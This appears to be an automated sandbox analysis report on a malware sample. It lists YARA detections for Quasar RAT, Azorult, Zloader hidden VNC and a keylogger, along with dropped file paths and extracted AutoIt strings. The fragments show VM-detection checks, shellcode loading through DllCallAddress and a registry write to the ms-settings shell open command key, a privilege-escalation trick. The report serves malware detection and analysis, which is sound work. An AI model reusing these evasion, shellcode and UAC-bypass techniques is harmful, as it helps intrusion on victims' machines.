Source: 6.2.windef.exe.f10000.0.unpack, type: UNPACKEDPE	Matched rule: Detects malware from disclosed CN malware set Author: Florian Roth
Source: 7.0.CVbJSUXraQ.exe.ee5bac.1.raw.unpack, type: UNPACKEDPE	Matched rule: Detects Patchwork malware Author: Florian Roth
Source: 7.0.CVbJSUXraQ.exe.ee5bac.1.raw.unpack, type: UNPACKEDPE	Matched rule: Detects Quasar RAT Author: Florian Roth
Source: 7.0.CVbJSUXraQ.exe.ee5bac.1.raw.unpack, type: UNPACKEDPE	Matched rule: Detects Quasar RAT Author: Florian Roth
Source: 7.0.CVbJSUXraQ.exe.ee5bac.1.raw.unpack, type: UNPACKEDPE	Matched rule: Detects QuasarRAT malware Author: Florian Roth
Source: 7.0.CVbJSUXraQ.exe.ee5bac.1.raw.unpack, type: UNPACKEDPE	Matched rule: Detects malware from disclosed CN malware set Author: Florian Roth
Source: 10.2.SystemPropertiesPerformance.exe.b75bac.1.raw.unpack, type: UNPACKEDPE	Matched rule: Detects Patchwork malware Author: Florian Roth
Source: 10.2.SystemPropertiesPerformance.exe.b75bac.1.raw.unpack, type: UNPACKEDPE	Matched rule: Detects Quasar RAT Author: Florian Roth
Source: 10.2.SystemPropertiesPerformance.exe.b75bac.1.raw.unpack, type: UNPACKEDPE	Matched rule: Detects Quasar RAT Author: Florian Roth
Source: 10.2.SystemPropertiesPerformance.exe.b75bac.1.raw.unpack, type: UNPACKEDPE	Matched rule: Detects QuasarRAT malware Author: Florian Roth
Source: 10.2.SystemPropertiesPerformance.exe.b75bac.1.raw.unpack, type: UNPACKEDPE	Matched rule: Detects malware from disclosed CN malware set Author: Florian Roth
Source: 10.3.SystemPropertiesPerformance.exe.187c7b0.3.unpack, type: UNPACKEDPE	Matched rule: Azorult Payload Author: kevoreilly
Source: 7.2.CVbJSUXraQ.exe.db0000.1.unpack, type: UNPACKEDPE	Matched rule: Detects Quasar RAT Author: Florian Roth
Source: 7.2.CVbJSUXraQ.exe.db0000.1.unpack, type: UNPACKEDPE	Matched rule: Detects Quasar RAT Author: Florian Roth
Source: 7.2.CVbJSUXraQ.exe.db0000.1.unpack, type: UNPACKEDPE	Matched rule: Detects QuasarRAT malware Author: Florian Roth
Source: 10.0.SystemPropertiesPerformance.exe.b75bac.1.raw.unpack, type: UNPACKEDPE	Matched rule: Detects Patchwork malware Author: Florian Roth
Source: 10.0.SystemPropertiesPerformance.exe.b75bac.1.raw.unpack, type: UNPACKEDPE	Matched rule: Detects Quasar RAT Author: Florian Roth
Source: 10.0.SystemPropertiesPerformance.exe.b75bac.1.raw.unpack, type: UNPACKEDPE	Matched rule: Detects Quasar RAT Author: Florian Roth
Source: 10.0.SystemPropertiesPerformance.exe.b75bac.1.raw.unpack, type: UNPACKEDPE	Matched rule: Detects QuasarRAT malware Author: Florian Roth
Source: 10.0.SystemPropertiesPerformance.exe.b75bac.1.raw.unpack, type: UNPACKEDPE	Matched rule: Detects malware from disclosed CN malware set Author: Florian Roth
Source: 7.0.CVbJSUXraQ.exe.db0000.0.unpack, type: UNPACKEDPE	Matched rule: Detects Quasar RAT Author: Florian Roth
Source: 7.0.CVbJSUXraQ.exe.db0000.0.unpack, type: UNPACKEDPE	Matched rule: Detects Quasar RAT Author: Florian Roth
Source: 7.0.CVbJSUXraQ.exe.db0000.0.unpack, type: UNPACKEDPE	Matched rule: Detects QuasarRAT malware Author: Florian Roth
Source: 7.2.CVbJSUXraQ.exe.ee9fac.3.raw.unpack, type: UNPACKEDPE	Matched rule: Detects Patchwork malware Author: Florian Roth
Source: 7.2.CVbJSUXraQ.exe.ee9fac.3.raw.unpack, type: UNPACKEDPE	Matched rule: Detects Quasar RAT Author: Florian Roth
Source: 7.2.CVbJSUXraQ.exe.ee9fac.3.raw.unpack, type: UNPACKEDPE	Matched rule: Detects Quasar RAT Author: Florian Roth
Source: 7.2.CVbJSUXraQ.exe.ee9fac.3.raw.unpack, type: UNPACKEDPE	Matched rule: Detects QuasarRAT malware Author: Florian Roth
Source: 7.2.CVbJSUXraQ.exe.ee9fac.3.raw.unpack, type: UNPACKEDPE	Matched rule: Detects malware from disclosed CN malware set Author: Florian Roth
Source: 7.2.CVbJSUXraQ.exe.ee9fac.3.raw.unpack, type: UNPACKEDPE	Matched rule: Detects Zloader hidden VNC Author: @VK_Intel
Source: 10.3.SystemPropertiesPerformance.exe.5d0f5cc.7.raw.unpack, type: UNPACKEDPE	Matched rule: Detects Vermin Keylogger Author: Florian Roth
Source: 10.3.SystemPropertiesPerformance.exe.5d0f5cc.7.raw.unpack, type: UNPACKEDPE	Matched rule: Detects Patchwork malware Author: Florian Roth
Source: 10.3.SystemPropertiesPerformance.exe.5d0f5cc.7.raw.unpack, type: UNPACKEDPE	Matched rule: Detects Quasar RAT Author: Florian Roth
Source: 10.3.SystemPropertiesPerformance.exe.5d0f5cc.7.raw.unpack, type: UNPACKEDPE	Matched rule: Detects Quasar RAT Author: Florian Roth
Source: 10.3.SystemPropertiesPerformance.exe.5d0f5cc.7.raw.unpack, type: UNPACKEDPE	Matched rule: Detects QuasarRAT malware Author: Florian Roth
Source: 10.3.SystemPropertiesPerformance.exe.5d0f5cc.7.raw.unpack, type: UNPACKEDPE	Matched rule: Detects malware from disclosed CN malware set Author: Florian Roth
Source: 10.3.SystemPropertiesPerformance.exe.5d0f5cc.7.raw.unpack, type: UNPACKEDPE	Matched rule: Detects Zloader hidden VNC Author: @VK_Intel
Source: 5.0.svchost.exe.c9ac50.2.raw.unpack, type: UNPACKEDPE	Matched rule: Detects Zloader hidden VNC Author: @VK_Intel
Source: 1.2.CVbJSUXraQ.exe.db0000.0.unpack, type: UNPACKEDPE	Matched rule: Detects Quasar RAT Author: Florian Roth
Source: 1.2.CVbJSUXraQ.exe.db0000.0.unpack, type: UNPACKEDPE	Matched rule: Detects Quasar RAT Author: Florian Roth
Source: 1.2.CVbJSUXraQ.exe.db0000.0.unpack, type: UNPACKEDPE	Matched rule: Detects QuasarRAT malware Author: Florian Roth
Source: 1.0.CVbJSUXraQ.exe.db0000.0.unpack, type: UNPACKEDPE	Matched rule: Detects Quasar RAT Author: Florian Roth
Source: 1.0.CVbJSUXraQ.exe.db0000.0.unpack, type: UNPACKEDPE	Matched rule: Detects Quasar RAT Author: Florian Roth
Source: 1.0.CVbJSUXraQ.exe.db0000.0.unpack, type: UNPACKEDPE	Matched rule: Detects QuasarRAT malware Author: Florian Roth
Source: 00000001.00000003.686336521.0000000001887000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Detects Quasar RAT Author: Florian Roth
Source: 00000013.00000000.745828436.0000000000DF2000.00000002.00020000.sdmp, type: MEMORY	Matched rule: Detects Quasar RAT Author: Florian Roth
Source: 00000017.00000000.783293959.0000000000AA2000.00000002.00020000.sdmp, type: MEMORY	Matched rule: Detects Quasar RAT Author: Florian Roth
Source: 0000000A.00000003.797016218.0000000005C71000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Detects Quasar RAT Author: Florian Roth
Source: 00000004.00000000.684341973.0000000000AB6000.00000008.00020000.sdmp, type: MEMORY	Matched rule: Detects Zloader hidden VNC Author: @VK_Intel
Source: 00000004.00000002.749080496.0000000000AB6000.00000008.00020000.sdmp, type: MEMORY	Matched rule: Detects Zloader hidden VNC Author: @VK_Intel
Source: 00000012.00000000.724863626.00000000003F2000.00000002.00020000.sdmp, type: MEMORY	Matched rule: Detects Quasar RAT Author: Florian Roth
Source: 00000013.00000002.754022001.0000000000DF2000.00000002.00020000.sdmp, type: MEMORY	Matched rule: Detects Quasar RAT Author: Florian Roth
Source: 00000001.00000003.684577030.000000000176B000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Detects Quasar RAT Author: Florian Roth
Source: 0000000A.00000003.790922233.00000000014D0000.00000040.00000001.sdmp, type: MEMORY	Matched rule: Azorult Payload Author: kevoreilly
Source: 0000000D.00000000.706677041.0000000000882000.00000002.00020000.sdmp, type: MEMORY	Matched rule: Detects Quasar RAT Author: Florian Roth
Source: 00000012.00000002.732311496.00000000003F2000.00000002.00020000.sdmp, type: MEMORY	Matched rule: Detects Quasar RAT Author: Florian Roth
Source: 00000015.00000000.775754648.0000000000DA6000.00000008.00020000.sdmp, type: MEMORY	Matched rule: Detects Zloader hidden VNC Author: @VK_Intel
Source: 00000006.00000000.686167876.0000000000F12000.00000002.00020000.sdmp, type: MEMORY	Matched rule: Detects Quasar RAT Author: Florian Roth
Source: 0000000A.00000003.785992209.000000000184E000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Detects Quasar RAT Author: Florian Roth
Source: 00000006.00000002.707649613.0000000000F12000.00000002.00020000.sdmp, type: MEMORY	Matched rule: Detects Quasar RAT Author: Florian Roth
Source: 00000007.00000000.687913717.0000000000E77000.00000002.00020000.sdmp, type: MEMORY	Matched rule: Detects Quasar RAT Author: Florian Roth
Source: 0000000D.00000002.938115894.0000000000882000.00000002.00020000.sdmp, type: MEMORY	Matched rule: Detects Quasar RAT Author: Florian Roth
Source: 00000001.00000000.668699670.0000000000E77000.00000002.00020000.sdmp, type: MEMORY	Matched rule: Detects Quasar RAT Author: Florian Roth
Source: 0000000A.00000000.695543942.0000000000B07000.00000002.00020000.sdmp, type: MEMORY	Matched rule: Detects Quasar RAT Author: Florian Roth
Source: 00000018.00000000.790493423.0000000000B07000.00000002.00020000.sdmp, type: MEMORY	Matched rule: Detects Quasar RAT Author: Florian Roth
Source: 0000000A.00000003.784574167.00000000018F6000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Detects Quasar RAT Author: Florian Roth
Source: 00000001.00000003.686395578.0000000001805000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Detects Quasar RAT Author: Florian Roth
Source: 0000000E.00000002.737013238.00000000001B2000.00000002.00020000.sdmp, type: MEMORY	Matched rule: Detects Quasar RAT Author: Florian Roth
Source: 0000000A.00000003.776479918.000000000184E000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Detects Quasar RAT Author: Florian Roth
Source: 00000001.00000002.939820117.0000000000E77000.00000002.00020000.sdmp, type: MEMORY	Matched rule: Detects Quasar RAT Author: Florian Roth
Source: 00000017.00000002.797076892.0000000000AA2000.00000002.00020000.sdmp, type: MEMORY	Matched rule: Detects Quasar RAT Author: Florian Roth
Source: 00000015.00000002.950447510.0000000000DA6000.00000008.00020000.sdmp, type: MEMORY	Matched rule: Detects Zloader hidden VNC Author: @VK_Intel
Source: 00000001.00000003.689148939.0000000003800000.00000040.00000001.sdmp, type: MEMORY	Matched rule: Azorult Payload Author: kevoreilly
Source: 00000007.00000002.939563903.0000000000E77000.00000002.00020000.sdmp, type: MEMORY	Matched rule: Detects Quasar RAT Author: Florian Roth
Source: 0000000E.00000000.708127388.00000000001B2000.00000002.00020000.sdmp, type: MEMORY	Matched rule: Detects Quasar RAT Author: Florian Roth
Source: 00000018.00000002.796549316.0000000000B07000.00000002.00020000.sdmp, type: MEMORY	Matched rule: Detects Quasar RAT Author: Florian Roth
Source: 0000000A.00000002.938805237.0000000000B07000.00000002.00020000.sdmp, type: MEMORY	Matched rule: Detects Quasar RAT Author: Florian Roth
Source: C:\Users\user\AppData\Roaming\SubDir\winsock.exe, type: DROPPED	Matched rule: Detects Vermin Keylogger Author: Florian Roth
Source: C:\Users\user\AppData\Roaming\SubDir\winsock.exe, type: DROPPED	Matched rule: Detects Patchwork malware Author: Florian Roth
Source: C:\Users\user\AppData\Roaming\SubDir\winsock.exe, type: DROPPED	Matched rule: Detects Quasar RAT Author: Florian Roth
Source: C:\Users\user\AppData\Roaming\SubDir\winsock.exe, type: DROPPED	Matched rule: Detects Quasar RAT Author: Florian Roth
Source: C:\Users\user\AppData\Roaming\SubDir\winsock.exe, type: DROPPED	Matched rule: Detects QuasarRAT malware Author: Florian Roth
Source: C:\Users\user\AppData\Roaming\SubDir\winsock.exe, type: DROPPED	Matched rule: Detects malware from disclosed CN malware set Author: Florian Roth
Source: C:\Users\user\AppData\Local\Temp\windef.exe, type: DROPPED	Matched rule: Detects Vermin Keylogger Author: Florian Roth
Source: C:\Users\user\AppData\Local\Temp\windef.exe, type: DROPPED	Matched rule: Detects Patchwork malware Author: Florian Roth
Source: C:\Users\user\AppData\Local\Temp\windef.exe, type: DROPPED	Matched rule: Detects Quasar RAT Author: Florian Roth
Source: C:\Users\user\AppData\Local\Temp\windef.exe, type: DROPPED	Matched rule: Detects Quasar RAT Author: Florian Roth
Source: C:\Users\user\AppData\Local\Temp\windef.exe, type: DROPPED	Matched rule: Detects QuasarRAT malware Author: Florian Roth
Source: C:\Users\user\AppData\Local\Temp\windef.exe, type: DROPPED	Matched rule: Detects malware from disclosed CN malware set Author: Florian Roth
Source: dropped/windef.exe, type: DROPPED	Matched rule: Detects Vermin Keylogger Author: Florian Roth
Source: dropped/windef.exe, type: DROPPED	Matched rule: Detects Patchwork malware Author: Florian Roth
Source: dropped/windef.exe, type: DROPPED	Matched rule: Detects Quasar RAT Author: Florian Roth
Source: dropped/windef.exe, type: DROPPED	Matched rule: Detects Quasar RAT Author: Florian Roth
Source: dropped/windef.exe, type: DROPPED	Matched rule: Detects QuasarRAT malware Author: Florian Roth
Source: dropped/windef.exe, type: DROPPED	Matched rule: Detects malware from disclosed CN malware set Author: Florian Roth
Source: C:\Users\user\btpanui\SystemPropertiesPerformance.exe, type: DROPPED	Matched rule: Detects Quasar RAT Author: Florian Roth
Source: C:\Users\user\btpanui\SystemPropertiesPerformance.exe, type: DROPPED	Matched rule: Detects Quasar RAT Author: Florian Roth
Source: C:\Users\user\btpanui\SystemPropertiesPerformance.exe, type: DROPPED	Matched rule: Detects QuasarRAT malware Author: Florian Roth

Binary is likely a compiled AutoIt script file

Source: C:\Users\user\Desktop\CVbJSUXraQ.exe	Code function: This is a third-party compiled AutoIt script.	1_2_00DB3B3A
Source: CVbJSUXraQ.exe	String found in binary or memory: This is a third-party compiled AutoIt script.
Source: CVbJSUXraQ.exe, 00000001.00000000.668612321.0000000000E64000.00000002.00020000.sdmp	String found in binary or memory: SDSOFTWARE\Classes\\CLSID\\\IPC$This is a third-party compiled AutoIt script."runasError allocating memory.SeAssignPrimaryTokenPrivilegeSeIncreaseQuotaPrivilegeSeBackupPrivilegeSeRestorePrivilegewinsta0defaultwinsta0\defaultComboBoxListBox\|SHELLDLL_DefViewlargeiconsdetailssmalliconslistCLASSCLASSNNREGEXPCLASSIDNAMEXYWHINSTANCETEXT%s%u%s%dLAST[LASTACTIVE[ACTIVEHANDLE=[HANDLE:REGEXP=[REGEXPTITLE:CLASSNAME=[CLASS:ALL[ALL]HANDLEREGEXPTITLETITLEThumbnailClassAutoIt3GUIContainer`
Source: C:\Users\user\Desktop\CVbJSUXraQ.exe	Code function: This is a third-party compiled AutoIt script.	7_2_00DB3B3A
Source: CVbJSUXraQ.exe	String found in binary or memory: This is a third-party compiled AutoIt script.
Source: CVbJSUXraQ.exe, 00000007.00000002.939474482.0000000000E64000.00000002.00020000.sdmp	String found in binary or memory: SDSOFTWARE\Classes\\CLSID\\\IPC$This is a third-party compiled AutoIt script."runasError allocating memory.SeAssignPrimaryTokenPrivilegeSeIncreaseQuotaPrivilegeSeBackupPrivilegeSeRestorePrivilegewinsta0defaultwinsta0\defaultComboBoxListBox\|SHELLDLL_DefViewlargeiconsdetailssmalliconslistCLASSCLASSNNREGEXPCLASSIDNAMEXYWHINSTANCETEXT%s%u%s%dLAST[LASTACTIVE[ACTIVEHANDLE=[HANDLE:REGEXP=[REGEXPTITLE:CLASSNAME=[CLASS:ALL[ALL]HANDLEREGEXPTITLETITLEThumbnailClassAutoIt3GUIContainer`
Source: C:\Users\user\btpanui\SystemPropertiesPerformance.exe	Code function: This is a third-party compiled AutoIt script.	10_2_00A43B3A
Source: SystemPropertiesPerformance.exe	String found in binary or memory: This is a third-party compiled AutoIt script.
Source: SystemPropertiesPerformance.exe, 0000000A.00000000.695369238.0000000000AF4000.00000002.00020000.sdmp	String found in binary or memory: SDSOFTWARE\Classes\\CLSID\\\IPC$This is a third-party compiled AutoIt script."runasError allocating memory.SeAssignPrimaryTokenPrivilegeSeIncreaseQuotaPrivilegeSeBackupPrivilegeSeRestorePrivilegewinsta0defaultwinsta0\defaultComboBoxListBox\|SHELLDLL_DefViewlargeiconsdetailssmalliconslistCLASSCLASSNNREGEXPCLASSIDNAMEXYWHINSTANCETEXT%s%u%s%dLAST[LASTACTIVE[ACTIVEHANDLE=[HANDLE:REGEXP=[REGEXPTITLE:CLASSNAME=[CLASS:ALL[ALL]HANDLEREGEXPTITLETITLEThumbnailClassAutoIt3GUIContainer`

AutoIt script contains suspicious strings

Source: CVbJSUXraQ.exe	AutoIt Script: ["vmtoolsd.exe" , "vbox.exe" ] FOR $I = "0" TO
Source: CVbJSUXraQ.exe	AutoIt Script: ) LOCAL $ARRAY = ["vmtoolsd.exe" , "vbox.exe" ] FO
Source: CVbJSUXraQ.exe	AutoIt Script: 1 = 63781146 THEN $BIN_SHELLCODE &= "0F848A000000837
Source: CVbJSUXraQ.exe	AutoIt Script: lFree" , "dword" , $LPSHELLCODE , "dword" , "0" , "
Source: CVbJSUXraQ.exe	AutoIt Script: Call" ) , EXECUTE ("DllCallAddress" ) , EXECUTE ("DllS
Source: CVbJSUXraQ.exe	AutoIt Script: 89 THEN REGWRITE ("HKCU\Software\Classes\ms-settings\shell\open\command" , "" , "REG_SZ" ,
Source: SystemPropertiesPerformance.exe.1.dr	AutoIt Script: ["vmtoolsd.exe" , "vbox.exe" ] FOR $I = "0" TO
Source: SystemPropertiesPerformance.exe.1.dr	AutoIt Script: ) LOCAL $ARRAY = ["vmtoolsd.exe" , "vbox.exe" ] FO
Source: SystemPropertiesPerformance.exe.1.dr	AutoIt Script: 1 = 63781146 THEN $BIN_SHELLCODE &= "0F848A000000837
Source: SystemPropertiesPerformance.exe.1.dr	AutoIt Script: lFree" , "dword" , $LPSHELLCODE , "dword" , "0" , "
Source: SystemPropertiesPerformance.exe.1.dr	AutoIt Script: Call" ) , EXECUTE ("DllCallAddress" ) , EXECUTE ("DllS
Source: SystemPropertiesPerformance.exe.1.dr	AutoIt Script: 89 THEN REGWRITE ("HKCU\Software\Classes\ms-settings\shell\open\command" , "" , "REG_SZ" ,

Detected potential crypto function

Source: C:\Users\user\Desktop\CVbJSUXraQ.exe	Code function: 1_2_00DBFCE0	1_2_00DBFCE0
Source: C:\Users\user\Desktop\CVbJSUXraQ.exe	Code function: 1_2_00DBE6A0	1_2_00DBE6A0
Source: C:\Users\user\Desktop\CVbJSUXraQ.exe	Code function: 1_2_00DBDF00	1_2_00DBDF00
Source: C:\Users\user\Desktop\CVbJSUXraQ.exe	Code function: 1_2_00DC8808	1_2_00DC8808
Source: C:\Users\user\Desktop\CVbJSUXraQ.exe	Code function: 1_2_00DDD975	1_2_00DDD975
Source: C:\Users\user\Desktop\CVbJSUXraQ.exe	Code function: 1_2_00DE62D2	1_2_00DE62D2
Source: C:\Users\user\Desktop\CVbJSUXraQ.exe	Code function: 1_2_00DB1287	1_2_00DB1287
Source: C:\Users\user\Desktop\CVbJSUXraQ.exe	Code function: 1_2_00DD1484	1_2_00DD1484
Source: C:\Users\user\Desktop\CVbJSUXraQ.exe	Code function: 1_2_00E37DDB	1_2_00E37DDB
Source: C:\Users\user\Desktop\CVbJSUXraQ.exe	Code function: 1_2_00DE6DB6	1_2_00DE6DB6
Source: C:\Users\user\Desktop\CVbJSUXraQ.exe	Code function: 1_2_00DDBDA6	1_2_00DDBDA6
Source: C:\Users\user\Desktop\CVbJSUXraQ.exe	Code function: 1_2_00DC66E1	1_2_00DC66E1
Source: C:\Users\user\Desktop\CVbJSUXraQ.exe	Code function: 1_2_00DC6F9E	1_2_00DC6F9E
Source: C:\Users\user\AppData\Local\Temp\vnc.exe	Code function: 4_2_00AB104C	4_2_00AB104C
Source: C:\Users\user\AppData\Local\Temp\vnc.exe	Code function: 4_2_00AC50BE	4_2_00AC50BE
Source: C:\Users\user\AppData\Local\Temp\vnc.exe	Code function: 4_2_00AC4C28	4_2_00AC4C28
Source: C:\Users\user\AppData\Local\Temp\vnc.exe	Code function: 4_2_00AC59EA	4_2_00AC59EA
Source: C:\Users\user\AppData\Local\Temp\vnc.exe	Code function: 4_2_00AC5554	4_2_00AC5554
Source: C:\Users\user\AppData\Local\Temp\vnc.exe	Code function: 4_2_00ADE153	4_2_00ADE153
Source: C:\Users\user\AppData\Local\Temp\vnc.exe	Code function: 4_2_00AC5E80	4_2_00AC5E80
Source: C:\Users\user\AppData\Local\Temp\vnc.exe	Code function: 4_2_00AC6263	4_2_00AC6263
Source: C:\Users\user\AppData\Local\Temp\vnc.exe	Code function: 4_2_00ADD39B	4_2_00ADD39B
Source: C:\Users\user\AppData\Local\Temp\vnc.exe	Code function: 4_2_00AD2F13	4_2_00AD2F13
Source: C:\Windows\System32\svchost.exe	Code function: 5_2_00C788A0	5_2_00C788A0
Source: C:\Windows\System32\svchost.exe	Code function: 5_2_00C694B0	5_2_00C694B0
Source: C:\Windows\System32\svchost.exe	Code function: 5_2_00C63C6C	5_2_00C63C6C
Source: C:\Windows\System32\svchost.exe	Code function: 5_2_00C7B420	5_2_00C7B420
Source: C:\Windows\System32\svchost.exe	Code function: 5_2_00C809D4	5_2_00C809D4
Source: C:\Windows\System32\svchost.exe	Code function: 5_2_00C72DE0	5_2_00C72DE0
Source: C:\Windows\System32\svchost.exe	Code function: 5_2_00C76984	5_2_00C76984
Source: C:\Windows\System32\svchost.exe	Code function: 5_2_00C799B0	5_2_00C799B0
Source: C:\Windows\System32\svchost.exe	Code function: 5_2_00C84174	5_2_00C84174
Source: C:\Windows\System32\svchost.exe	Code function: 5_2_00C7DED4	5_2_00C7DED4
Source: C:\Windows\System32\svchost.exe	Code function: 5_2_00C7FAD4	5_2_00C7FAD4
Source: C:\Windows\System32\svchost.exe	Code function: 5_2_00C7EADC	5_2_00C7EADC
Source: C:\Windows\System32\svchost.exe	Code function: 5_2_00C766A4	5_2_00C766A4
Source: C:\Windows\System32\svchost.exe	Code function: 5_2_00C73A10	5_2_00C73A10
Source: C:\Windows\System32\svchost.exe	Code function: 5_2_00C687CC	5_2_00C687CC
Source: C:\Windows\System32\svchost.exe	Code function: 5_2_00C727D4	5_2_00C727D4
Source: C:\Windows\System32\svchost.exe	Code function: 5_2_00C803EC	5_2_00C803EC
Source: C:\Windows\System32\svchost.exe	Code function: 5_2_00C733EC	5_2_00C733EC
Source: C:\Windows\System32\svchost.exe	Code function: 5_2_00C84BE4	5_2_00C84BE4
Source: C:\Windows\System32\svchost.exe	Code function: 5_2_00C82F5C	5_2_00C82F5C
Source: C:\Windows\System32\svchost.exe	Code function: 5_2_00C6B36C	5_2_00C6B36C
Source: C:\Windows\System32\svchost.exe	Code function: 5_2_00C68F68	5_2_00C68F68
Source: C:\Windows\System32\svchost.exe	Code function: 5_2_00C78F34	5_2_00C78F34
Source: C:\Windows\System32\svchost.exe	Code function: 5_2_00CA9878	5_2_00CA9878
Source: C:\Windows\System32\svchost.exe	Code function: 5_2_00CAA1A4	5_2_00CAA1A4
Source: C:\Windows\System32\svchost.exe	Code function: 5_2_00CA9D0E	5_2_00CA9D0E
Source: C:\Windows\System32\svchost.exe	Code function: 5_2_00CAAAD0	5_2_00CAAAD0
Source: C:\Windows\System32\svchost.exe	Code function: 5_2_00CAAEB3	5_2_00CAAEB3
Source: C:\Windows\System32\svchost.exe	Code function: 5_2_00CAA63A	5_2_00CAA63A
Source: C:\Windows\System32\svchost.exe	Code function: 5_2_00CB7B63	5_2_00CB7B63
Source: C:\Users\user\AppData\Local\Temp\windef.exe	Code function: 6_2_00F12EC4	6_2_00F12EC4
Source: C:\Users\user\AppData\Local\Temp\windef.exe	Code function: 6_2_00F18FCC	6_2_00F18FCC
Source: C:\Users\user\AppData\Local\Temp\windef.exe	Code function: 6_2_00F17482	6_2_00F17482
Source: C:\Users\user\Desktop\CVbJSUXraQ.exe	Code function: 7_2_00DC8808	7_2_00DC8808
Source: C:\Users\user\Desktop\CVbJSUXraQ.exe	Code function: 7_2_00DC3030	7_2_00DC3030
Source: C:\Users\user\Desktop\CVbJSUXraQ.exe	Code function: 7_2_00DD21C5	7_2_00DD21C5
Source: C:\Users\user\Desktop\CVbJSUXraQ.exe	Code function: 7_2_00DD3187	7_2_00DD3187
Source: C:\Users\user\Desktop\CVbJSUXraQ.exe	Code function: 7_2_00DD1978	7_2_00DD1978
Source: C:\Users\user\Desktop\CVbJSUXraQ.exe	Code function: 7_2_00DB1287	7_2_00DB1287
Source: C:\Users\user\Desktop\CVbJSUXraQ.exe	Code function: 7_2_00DDCB21	7_2_00DDCB21
Source: C:\Users\user\Desktop\CVbJSUXraQ.exe	Code function: 7_2_00DBFCE0	7_2_00DBFCE0
Source: C:\Users\user\Desktop\CVbJSUXraQ.exe	Code function: 7_2_00DD1484	7_2_00DD1484
Source: C:\Users\user\Desktop\CVbJSUXraQ.exe	Code function: 7_2_00DD25FA	7_2_00DD25FA
Source: C:\Users\user\Desktop\CVbJSUXraQ.exe	Code function: 7_2_00E37DDB	7_2_00E37DDB
Source: C:\Users\user\Desktop\CVbJSUXraQ.exe	Code function: 7_2_00DD1D90	7_2_00DD1D90
Source: C:\Users\user\Desktop\CVbJSUXraQ.exe	Code function: 7_2_00DC5520	7_2_00DC5520
Source: C:\Users\user\Desktop\CVbJSUXraQ.exe	Code function: 7_2_00DC5760	7_2_00DC5760
Source: C:\Users\user\Desktop\CVbJSUXraQ.exe	Code function: 7_2_00DBDF00	7_2_00DBDF00
Source: C:\Users\user\btpanui\SystemPropertiesPerformance.exe	Code function: 10_2_00A63187	10_2_00A63187
Source: C:\Users\user\btpanui\SystemPropertiesPerformance.exe	Code function: 10_2_00A4FCE0	10_2_00A4FCE0
Source: C:\Users\user\btpanui\SystemPropertiesPerformance.exe	Code function: 10_2_00A4E6A0	10_2_00A4E6A0
Source: C:\Users\user\btpanui\SystemPropertiesPerformance.exe	Code function: 10_2_00A4DF00	10_2_00A4DF00
Source: C:\Users\user\btpanui\SystemPropertiesPerformance.exe	Code function: 10_2_00A53030	10_2_00A53030
Source: C:\Users\user\btpanui\SystemPropertiesPerformance.exe	Code function: 10_2_00A58808	10_2_00A58808
Source: C:\Users\user\btpanui\SystemPropertiesPerformance.exe	Code function: 10_2_00A621C5	10_2_00A621C5
Source: C:\Users\user\btpanui\SystemPropertiesPerformance.exe	Code function: 10_2_00A6F1D9	10_2_00A6F1D9
Source: C:\Users\user\btpanui\SystemPropertiesPerformance.exe	Code function: 10_2_00A6D975	10_2_00A6D975
Source: C:\Users\user\btpanui\SystemPropertiesPerformance.exe	Code function: 10_2_00A61978	10_2_00A61978
Source: C:\Users\user\btpanui\SystemPropertiesPerformance.exe	Code function: 10_2_00A41287	10_2_00A41287
Source: C:\Users\user\btpanui\SystemPropertiesPerformance.exe	Code function: 10_2_00A762D2	10_2_00A762D2
Source: C:\Users\user\btpanui\SystemPropertiesPerformance.exe	Code function: 10_2_00A6CB21	10_2_00A6CB21
Source: C:\Users\user\btpanui\SystemPropertiesPerformance.exe	Code function: 10_2_00A61484	10_2_00A61484
Source: C:\Users\user\btpanui\SystemPropertiesPerformance.exe	Code function: 10_2_00A7242E	10_2_00A7242E
Source: C:\Users\user\btpanui\SystemPropertiesPerformance.exe	Code function: 10_2_00A6BDA6	10_2_00A6BDA6
Source: C:\Users\user\btpanui\SystemPropertiesPerformance.exe	Code function: 10_2_00A76DB6	10_2_00A76DB6
Source: C:\Users\user\btpanui\SystemPropertiesPerformance.exe	Code function: 10_2_00A61D90	10_2_00A61D90
Source: C:\Users\user\btpanui\SystemPropertiesPerformance.exe	Code function: 10_2_00A625FA	10_2_00A625FA
Source: C:\Users\user\btpanui\SystemPropertiesPerformance.exe	Code function: 10_2_00AC7DDB	10_2_00AC7DDB
Source: C:\Users\user\btpanui\SystemPropertiesPerformance.exe	Code function: 10_2_00A55520	10_2_00A55520
Source: C:\Users\user\btpanui\SystemPropertiesPerformance.exe	Code function: 10_2_00A566E1	10_2_00A566E1
Source: C:\Users\user\btpanui\SystemPropertiesPerformance.exe	Code function: 10_2_00A56F9E	10_2_00A56F9E
Source: C:\Users\user\btpanui\SystemPropertiesPerformance.exe	Code function: 10_2_00A55760	10_2_00A55760

Abnormal high CPU Usage

Source: C:\Users\user\btpanui\SystemPropertiesPerformance.exe	Process Stats: CPU usage > 98%
Source: C:\Users\user\Desktop\CVbJSUXraQ.exe	Process Stats: CPU usage > 98%

PE file contains strange resources

Source: CVbJSUXraQ.exe	Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: CVbJSUXraQ.exe	Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: CVbJSUXraQ.exe	Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: CVbJSUXraQ.exe	Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: SystemPropertiesPerformance.exe.1.dr	Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: SystemPropertiesPerformance.exe.1.dr	Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: SystemPropertiesPerformance.exe.1.dr	Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: SystemPropertiesPerformance.exe.1.dr	Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST

Uses 32bit PE files

Source: CVbJSUXraQ.exe

Static PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE

Yara signature match

